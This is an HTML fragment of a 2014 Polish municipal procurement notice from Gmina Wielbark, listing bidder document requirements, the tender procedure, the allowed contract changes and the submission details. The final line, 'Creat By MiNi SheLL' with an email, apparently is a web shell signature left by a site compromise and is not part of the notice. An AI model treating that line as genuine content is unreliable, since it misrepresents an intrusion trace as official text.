<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji przedmiotowego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu przedmiotowego zamówienia sporządzonego według wzoru stanowiącego załącznik nr 5 do SIWZ.                                                           
 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.   
 3. W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru do oferty należy dołączyć stosowne pełnomocnictwo (a).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Postanowienia umowy mogą zostać zmienione w następującym zakresie:
a) zmniejszenie ilości zamówienia - wynikające z faktu, iż realizacja tej części stała się dla Zamawiającego nieuzasadniona społecznie lub ekonomicznie. 
b) zmiany terminu kolejności wykonania poszczególnych zakresów rzeczowych.
c) zmniejszenie wynagrodzenia z powodu ograniczenia zamówienia na interes publiczny, co nie było do przewidzenia w dniu zawarcia umowy.
d) zmiana VAT.
e) zmiana prawa mająca wpływ na termin lub zakres zamówienia.
 Powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Powyższe postanowienia nie stanowią zobowiązania zamawiającego do wyrażenia zgody na ich wprowadzenie.
Warunki zmian:
   -   inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
   -   uzasadnienie zmian- prawidłowa realizacja przedmiotu umowy,
   -   forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wielbark-ug.bip-wm.pl/public/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielbark
12-160 Wielbark ul. Grunwaldzka 2,  pok. nr 2.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.09.2014 godzina 10:00, miejsce: Urząd Gminy Wielbark
12-160 Wielbark ul. Grunwaldzka 2,  pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com